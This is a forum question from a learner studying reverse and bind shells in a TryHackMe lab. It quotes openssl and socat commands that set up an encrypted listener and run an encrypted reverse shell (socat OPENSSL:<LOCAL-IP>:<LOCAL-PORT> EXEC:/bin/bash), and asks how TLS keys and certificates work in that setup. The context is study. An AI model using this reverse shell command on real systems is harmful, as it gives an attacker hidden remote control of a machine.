While studying reverse/bind shells on TryHackMe, I encountered a few lines of code whose functions I am struggling to fully understand. Here is the code in question:
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
-generates an RSA private key. What specifies it as being private and not public?
-generates a certificate, however I thought certificates were mainly used for websites?
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
-socat is opening a listener with OpenSSL instead of TCP, which I assume starts an endpoint of an encrypted channel.
-This listener is using a .pem file that is created with a line of code not included here, which includes the private key and TLS certificate.
-The listener is being set to run with that certificate, while 'verify=0' ensures it is run without checking its authenticity from a CA.
socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash
-The target connects to the listener by specifying its IP and port number, while also not checking for the authenticity of a certificate.
What exactly is going on here? Why does the machine connecting to the OpenSSL listener not need to provide a key for an encrypted channel? What is the difference between socat TCP-L and socat OPENSSL-L?
If anyone could help by breaking down some of what's happening it'd be greatly appreciated.